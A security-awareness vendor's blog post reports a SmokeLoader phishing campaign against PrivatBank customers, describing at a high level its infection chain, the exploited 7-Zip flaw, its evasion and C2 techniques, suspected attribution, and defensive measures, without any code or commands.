Phishing simulation Awareness training Data breach detection Pricing About Blog Resources Contact
Get started Log in

Ukraine's largest bank hit by SmokeLoader malware

PrivatBank hit by SmokeLoader malware in a phishing attack exploiting a 7-Zip vulnerability. Discover how it works and how to stay protected.

07-02-2025 - 7 minute read. Posted in: cybercrime.

Ukraine's largest bank hit by SmokeLoader malware

PrivatBank hit by SmokeLoader malware in phishing attack

In a recent cyber threat targeting Ukraine's financial sector, attackers launched a large-scale phishing attack against customers of the country's largest state-owned bank, PrivatBank. Cybercriminals deployed the SmokeLoader malware, a well-known and dangerous tool, to establish backdoors on infected systems and download additional malicious software. The attack demonstrated a remarkable level of sophistication and was first discovered by cybersecurity firm CloudSEK, which analyzed the tactics and targeting of the campaign.

How the Smokeloader Malware attack unfolded

The attack was executed through a targeted phishing campaign, where victims received fraudulent emails containing malicious attachments. These attachments were typically password-protected ZIP or RAR files containing JavaScript, VBScript, or LNK files (Windows shortcut files), which manipulated the execution flow to initiate the attack.

When a user opened the archive and entered the provided password, a series of malicious actions were triggered:

  1. Code injection: The malicious script injected harmful code into a legitimate Windows process, such as wscript.exe, to evade security systems.

  2. PowerShell commands: A hidden PowerShell command was activated, typically performing two tasks:

  • A legitimate-looking PDF document or other decoy file was opened to divert the user’s suspicion.

  • A hidden process was initiated, contacting a remote Command-and-Control (C2) server and downloading the SmokeLoader malware.

  1. SmokeLoader activation: Once SmokeLoader was installed, it acted as a downloader for additional malicious software, including trojans, keyloggers, and ransomware.

Recently, a new variant of this attack has been observed, where attackers use Windows shortcut files (LNK files) as decoys. When a user opens such a file, a hidden PowerShell command is executed, fetching and running the malware directly from the hacker’s server.

Initial infection: Phishing attacks

Phishing attacks are a prevalent method employed by threat actors to disseminate SmokeLoader malware. These attacks typically involve sending emails with malicious attachments or links that, when opened or clicked, download the malware onto the victim’s device. The emails often appear to be legitimate, making it challenging for Windows users to distinguish them from genuine messages.

To protect against phishing attacks, it is crucial to exercise caution when receiving unsolicited emails, especially those containing attachments or links. Utilizing robust antivirus software can help detect and block malicious emails. Additionally, keeping the operating system and all software up to date is essential to prevent the exploitation of vulnerabilities that may be leveraged in phishing attacks.

Are you not sure how phishing works? Explore our guide to phishing and its dangers.

SmokeLoader malware: Indicators of compromise

SmokeLoader is a well-known and notorious malware that has been active since 2011. SmokeLoader is part of a larger group of malware families that have been active since 2011. It is primarily used to infiltrate computers and download other malware, including trojans, keyloggers, and ransomware. It is known for its advanced evasion techniques, including:

  • Hiding within legitimate software

  • Dynamically modifying its code to evade antivirus detection

  • Manipulating system processes to bypass security tools

CloudSEK’s research also revealed that hackers are exploiting a known vulnerability in 7-Zip, a popular open-source file archiver developed by Russian programmer Igor Pavlov. SmokeLoader can also install password stealers, which are designed to capture and transmit sensitive information such as login credentials. The vulnerability, identified as CVE-2025-0411, was discovered by researchers at Tokyo-based Trend Micro in September and patched two months later. This delay gave hackers ample time to exploit the vulnerability in the wild.

Malware behavior: PROPagate injection technique

SmokeLoader employs the sophisticated PROPagate injection technique to inject malicious code into legitimate Windows processes. This technique exploits the Windows SetWindowsSubclass function to insert code into other running processes, allowing the malware to mask its activity and leverage the permissions and capabilities of the infected process.

The PROPagate injection technique is a highly advanced method used by SmokeLoader to evade detection and analysis. To counter such sophisticated techniques, it is essential to have advanced threat intelligence and security measures in place, ensuring that malicious activities are detected and prevented promptly.

Connection to UAC-0006 and FIN7 threat actors

Cybersecurity experts believe this attack may have been carried out by UAC-0006, a cybercriminal group that has been active for several years. In this particular sample of the attack, the methods used closely resemble those previously employed by the group. The group has previously been linked to attacks on financial institutions in Ukraine.

The methods used in this attack also resemble tactics previously employed by the Russian-linked hacker group FIN7 (also known as Carbanak or Anunak). FIN7 specializes in cybercrime targeting banks and retail businesses worldwide and is known for its sophisticated phishing campaigns.

Communication and C2: Encrypted C2s

SmokeLoader malware utilizes encrypted command and control (C2) servers to communicate with its operators. The malware employs a custom XOR-based decryption algorithm to decrypt the list of encrypted C2s, a mechanism designed to prevent other hackers from creating a builder that patches samples with new C2s.

The use of encrypted C2s makes it challenging to track and disrupt SmokeLoader’s communication with its operators. However, security researchers and threat intelligence teams can analyze the malware’s communication patterns and indicators of compromise (IOCs) to identify and block malicious activity effectively.

What threat do phishing attacks pose?

The attack on PrivatBank is part of a larger trend where cybercriminals target critical infrastructure in Ukraine. SmokeLoader often facilitates the distribution of other malware families, increasing the overall threat level. SmokeLoader provides attackers with a backdoor into the victim’s computer, which can lead to:

  • Financial theft: Hackers can gain access to sensitive banking information and carry out unauthorized transactions.

  • Data collection: Cybercriminals can monitor user activity and steal personal data.

  • Ransomware attacks: SmokeLoader can download ransomware that encrypts the victim’s files and demands a ransom. The recent increase in SmokeLoader infections highlights the need for advanced detection technologies to combat these threats.

Want to understand how ransomware works and how to protect yourself? Learn more about ransomware attacks and their impact.

How to protect against SmokeLoader attacks

To reduce the risk of falling victim to this type of attack, both organizations and individuals should implement the following security measures:

  • Be skeptical of emails from unknown senders: Never open attachments from suspicious sources.

  • Use multi-factor authentication (MFA): This can prevent attackers from accessing accounts even if login credentials are compromised.

  • Keep software updated: Ensure that all systems, including antivirus programs, are up to date to protect against known vulnerabilities.

  • Utilize advanced security tools: Implement intrusion detection systems (IDS) and endpoint detection and response (EDR) to detect suspicious activity. Understanding the Process Environment Block (PEB) can help in identifying and mitigating malware that dynamically accesses system libraries during runtime.

  • Limit user access rights: Apply the principle of least privilege, ensuring users only have access to necessary systems and data.

  • Monitor network traffic: Watch for unusual connections to known Command-and-Control servers.

Conclusion

The attack on PrivatBank highlights the growing threat cybercriminals pose to financial institutions—especially in wartime Ukraine, where state-backed hackers are frequently active. With increasingly sophisticated attack methods, organizations must take cybersecurity seriously and implement robust defense mechanisms. To understand more about how state-sponsored hacking plays a role in cyber warfare, explore our in-depth guide on state-sponsored cyber attacks.

The latest SmokeLoader attack is yet another reminder of the importance of staying vigilant against phishing threats and having strong security measures in place. If your organization has not yet implemented comprehensive security strategies, now is the time to elevate your cybersecurity posture.

Author Sarah Krarup

Sarah Krarup

Sarah studies innovation and entrepreneurship with a deep interest in IT and how cybersecurity impacts businesses and individuals. She has extensive experience in copywriting and is dedicated to making cybersecurity information accessible and engaging for everyone.

View all posts by Sarah Krarup

Similar posts

TTP and the hunt of them
awareness

TTP and the hunt of them

Here we review what TTP is, how specialists work with it, and what they typically look for when detecting TTP.

13-02-2023 · 6 min.
What is a drive-by download?
cybercrime

What is a drive-by download?

Drive-by downloads can pose a major risk to your online security, so it's important to be aware of this type of cyber attack.

17-08-2022 · 11 min.
What is a dictionary attack?
hacking

What is a dictionary attack?

Dictionary attacks are a type of cyber attack that you can easily prevent by taking some simple precautions. In this article, we explain how.

23-11-2022 · 8 min.